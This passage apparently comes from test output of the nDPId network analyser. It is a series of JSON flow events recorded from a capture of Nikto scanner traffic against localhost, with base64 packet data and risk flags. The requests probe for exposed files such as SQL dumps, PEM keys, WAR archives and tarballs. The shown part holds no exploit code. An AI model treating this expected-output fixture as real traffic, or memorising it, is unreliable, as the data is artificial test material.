{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1576420277322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277322,"pkt":"AAAAAAAAAAAAAAAACABFAADBuGlAAEAGg8t\/AAABfwAAAcS+H5BzjYDWLFz9IYAYAED+tQAAAQEICp1m\/XKdZv1yR0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1576420277324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277324,"pkt":"AAAAAAAAAAAAAAAACABFAADB11JAAEAGZOJ\/AAABfwAAAcTAH5DtMO\/kM\/E\/tYAYAED+tQAAAQEICp1m\/XSdZv10R0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1576420277325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277325,"pkt":"AAAAAAAAAAAAAAAACABFAAC96FRAAEAGU+R\/AAABfwAAAcTCH5AdeNDi26Tri4AYAED+sQAAAQEICp1m\/XWdZv11R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1576420277326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277326,"pkt":"AAAAAAAAAAAAAAAACABFAAC95+5AAEAGVEp\/AAABfwAAAcTEH5Cz199gOp5CH4AYAED+sQAAAQEICp1m\/XadZv12R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1576420277328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277328,"pkt":"AAAAAAAAAAAAAAAACABFAADAqSFAAEAGkxR\/AAABfwAAAcTGH5DtDpGsIyeJWoAYAED+tAAAAQEICp1m\/XidZv14R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1576420277329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277329,"pkt":"AAAAAAAAAAAAAAAACABFAADA2JJAAEAGY6N\/AAABfwAAAcTIH5BNx+AlanMTuoAYAED+tAAAAQEICp1m\/XmdZv15R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1576420277331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277331,"pkt":"AAAAAAAAAAAAAAAACABFAADHC9ZAAEAGMFl\/AAABfwAAAcTKH5CiFTNhL7Iog4AYAED+uwAAAQEICp1m\/XqdZv16R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1576420277333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277333,"pkt":"AAAAAAAAAAAAAAAACABFAADHgXtAAEAGurN\/AAABfwAAAcTMH5Cx2rnNvwRWuoAYAED+uwAAAQEICp1m\/X2dZv19R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1576420277334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277334,"pkt":"AAAAAAAAAAAAAAAACABFAADFmcZAAEAGomp\/AAABfwAAAcTOH5DYYKFyIBNeYIAYAED+uQAAAQEICp1m\/X6dZv1+R0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1576420277336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277336,"pkt":"AAAAAAAAAAAAAAAACABFAADFO7NAAEAGAH5\/AAABfwAAAcTQH5BUXAMIX4xO7oAYAED+uQAAAQEICp1m\/YCdZv2AR0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1576420277337,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277337,"pkt":"AAAAAAAAAAAAAAAACABFAAC9OaFAAEAGAph\/AAABfwAAAcTSH5DijwEqjka6TYAYAED+sQAAAQEICp1m\/YGdZv2BR0VUIC8wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 